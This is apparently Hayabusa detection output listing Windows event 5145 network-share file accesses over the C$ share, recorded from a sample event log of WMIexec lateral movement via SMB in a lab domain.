2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\Temp  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
